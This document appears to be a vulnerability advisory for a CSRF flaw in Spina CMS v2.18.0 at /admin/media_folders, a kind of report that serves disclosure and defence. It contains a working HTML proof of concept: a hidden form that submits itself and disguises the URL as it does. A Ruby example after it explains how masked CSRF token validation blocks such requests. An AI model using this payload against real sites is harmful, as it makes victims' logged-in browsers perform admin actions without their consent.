[description]

Spina CMS v2.18.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the URI /admin/media_folders.


[Vulnerability Type]

Cross-Site Request Forgery (CSRF)


[Vendor of Product]

Spina CMS, https://github.com/SpinaCMS/Spina


[Affected Product Code Base]

<=v2.18.0


[Impact Escalation of Privileges]

true


[POC]

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <!-- Auto-submitting form that replays the recorded POST to /admin/media_folders -->
    <form action="https://spinacms-demo.herokuapp.com/admin/media_folders" method="POST">
      <input type="hidden" name="utf8" value="â&#156;&#147;" />
      <!-- authenticity_token value copied verbatim from the recorded request -->
      <input type="hidden" name="authenticity&#95;token" value="YHbA&#47;a9JxqaH6dBpw3EnP&#47;vL2WzJM6L8obuUr1uIhkUlET&#47;JRM987f66bvcMD8BHXIsfY0WLMinCaXd&#43;k&#43;Ka7Q&#61;&#61;" />
      <input type="hidden" name="media&#95;folder&#91;name&#93;" value="123" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Rewrite the visible URL, then submit the form without any user interaction
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
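As an added defender-side example (written for this page, not Spina's or Rails' own code), the following simplified model of a per-session, masked CSRF token shows the check that makes a form like the one above fail when its `authenticity_token` was captured from a different session: the raw token stays in the server-side session, every rendered form carries a freshly masked copy, and the server unmasks and compares in constant time. Names such as `mask_token` and `valid_token?` are assumptions for illustration.

```ruby
require 'securerandom'
require 'base64'

# Simplified model of a Rails-style masked CSRF token (assumption: this
# mirrors the per-session masked-token idea, not Spina's or Rails' own code).
TOKEN_LENGTH = 32

# The raw token is generated once and kept only in the server-side session.
def new_session_token
  SecureRandom.random_bytes(TOKEN_LENGTH)
end

def xor_bytes(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

# Each rendered form gets a fresh masked copy: base64(pad || (pad XOR raw)).
# Masking means two forms from the same session carry different token strings.
def mask_token(raw)
  pad = SecureRandom.random_bytes(TOKEN_LENGTH)
  Base64.strict_encode64(pad + xor_bytes(pad, raw))
end

# Server side: decode, unmask, and compare against the session's raw token.
def valid_token?(session_raw, submitted)
  return false if submitted.nil?
  decoded = begin
    Base64.strict_decode64(submitted)
  rescue ArgumentError
    return false # malformed token
  end
  return false unless decoded.bytesize == 2 * TOKEN_LENGTH
  pad = decoded[0, TOKEN_LENGTH]
  masked = decoded[TOKEN_LENGTH, TOKEN_LENGTH]
  unmasked = xor_bytes(pad, masked)
  # Constant-time comparison: OR together every byte difference, accept only if all zero.
  unmasked.bytes.zip(session_raw.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Demo: the victim's session accepts its own masked token but rejects a token
# that was captured in another session (what a static token in a CSRF page is).
def demo
  victim_session = new_session_token
  other_session = new_session_token # constructed stand-in for a captured token's origin
  {
    own_token_accepted: valid_token?(victim_session, mask_token(victim_session)),
    foreign_token_rejected: !valid_token?(victim_session, mask_token(other_session)),
    missing_token_rejected: !valid_token?(victim_session, nil)
  }
end
```

If the endpoint accepts the request anyway, the controller is skipping or not enforcing this verification, which is the condition to look for when triaging a report like this one.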